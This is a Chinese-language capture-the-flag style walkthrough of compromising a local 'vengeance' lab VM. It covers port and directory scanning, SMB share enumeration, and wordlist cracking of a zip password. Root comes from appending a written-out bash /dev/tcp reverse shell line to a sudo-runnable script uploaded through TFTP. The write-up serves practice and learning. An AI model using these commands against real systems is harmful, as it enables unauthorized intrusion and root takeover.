靶场搭建
直接下载导入,打开即可使用
IP:192.168.1.136
渗透过程
信息初收集
80/udp closed http
123/udp closed ntp
139/udp closed netbios-ssn
161/udp closed snmp
445/udp closed microsoft-ds
2049/udp closed nfs
7/tcp closed echo
22/tcp closed ssh
80/tcp open http
88/tcp closed kerberos-sec
110/tcp open pop3
113/tcp open ident
139/tcp open netbios-ssn
143/tcp open imap
161/tcp closed snmp
389/tcp closed ldap
443/tcp open https
445/tcp open microsoft-ds
993/tcp open imaps
995/tcp open pop3s
1337/tcp closed waste
2049/tcp closed nfs
6000/tcp closed X11
8080/tcp closed http-proxy
22222/tcp open easyengine
54321/tcp closed unknown
wordpress的网站
[07:56:41] 200 - 220B - /.bash_logout
[07:56:41] 200 - 4KB - /.bashrc
[07:56:46] 200 - 807B - /.profile
[07:57:33] 301 - 0B - /index.php -> http://192.168.1.136/
[07:57:38] 200 - 19KB - /license.txt
[07:57:58] 200 - 7KB - /readme.html
[07:58:21] 301 - 178B - /wp-admin -> http://192.168.1.136/wp-admin/
[07:58:22] 301 - 178B - /wp-content -> http://192.168.1.136/wp-content/
[07:58:22] 200 - 1KB - /wp-admin/install.php
[07:58:22] 200 - 0B - /wp-content/
[07:58:22] 200 - 0B - /wp-config.php
[07:58:22] 200 - 69B - /wp-content/plugins/akismet/akismet.php
[07:58:23] 200 - 0B - /wp-cron.php
[07:58:23] 301 - 178B - /wp-includes -> http://192.168.1.136/wp-includes/
[07:58:23] 200 - 0B - /wp-includes/rss-functions.php
Sharename Type Comment
--------- ---- -------
Anonymous Disk
print$ Disk Printer Drivers
sarapublic$ Disk Sara's Public Files
IPC$ IPC IPC Service (vengeance server (Samba, Ubuntu))
S-1-22-1-1000 Unix User\sara (Local User)
S-1-22-1-1001 Unix User\qinyi (Local User)
smbclient //192.168.1.136/sarapublic$
发现有一些东西
eaurouge.txt N 11 Sun Mar 7 21:46:53 2021
eaurouge N 110 Tue Feb 23 06:06:40 2021
essay.txt N 1257 Mon Mar 8 05:28:34 2021
gio.zip N 11150297 Sun Feb 21 00:48:13 2021
cognac D 0 Tue Feb 23 12:48:47 2021
blurb.txt N 525 Sun Mar 7 21:55:24 2021
champagne D 0 Tue Feb 23 11:15:07 2021
profile.txt N 337 Sun Mar 7 21:45:26 2021
破解压缩包密码
zip有密码,根据前面的一大堆废话,推测可能要利用profile.txt的信息生成字典,对压缩包进行爆破
通过起一个http服务,将profile.txt挂到web服务器上,使用cewl生成字典。
通过zip2john
生成zip的hash,然后通过john对其进行爆破,最终得到密码nanotechnological
通过查看pass_reminder.txt
知道了密码的规则,结合PPT中获取的信息,组合出密码:giovanni_130R_Suzuka
提权
ssh端口是22222,尝试使用密码登录,发现能登录上qinyi这个账号
查看一下sudo权限
User qinyi may run the following commands on vengeance:
(root) NOPASSWD: /bin/systemctl restart nginx, /home/sara/private/eaurouge
能够重启nginx
能够执行sara中的文件,那么一定和sara有关,查一下进程通过sara过滤一下子
qinyi@vengeance:~$ ps -ef | grep "sara"
root 972 1 0 11:53 ? 00:00:00 /usr/sbin/in.tftpd --listen --user root --address :69 --secure --create /home/sara/private
看到有tftp,而且就是这个文件夹,拿我们直接下载下来这个文件看看怎么事
┌──(root㉿kali)-[~]
└─# tftp 192.168.1.136 69
tftp> get eaurouge
tftp> quit
打开瞅一眼,懂了
┌──(root㉿kali)-[~]
└─# cat eaurouge
#!/bin/bash
touch /home/sara/public/test.txt
echo "Test file" > /home/sara/public/test.txt
chown sara:sara /home/sara/public/test.txt
chmod 644 /home/sara/public/test.txt
写一个反弹shell进去
┌──(root㉿kali)-[~]
└─# echo "bash -c 'exec bash -i &>/dev/tcp/192.168.1.129/4444 <&1'" >> eaurouge
再传上去
┌──(root㉿kali)-[~]
└─# tftp 192.168.1.136 69
tftp> put eaurouge
tftp> quit
监听sudo执行,直接拿到root的shell!
打完收工。
小结
信息收集的时候思路其实挺卡的,有用的信息没有那么直观,往往需要进行二次加工。这是很恼火的点。
我还是喜欢暴力的,脑筋急转弯很不爽。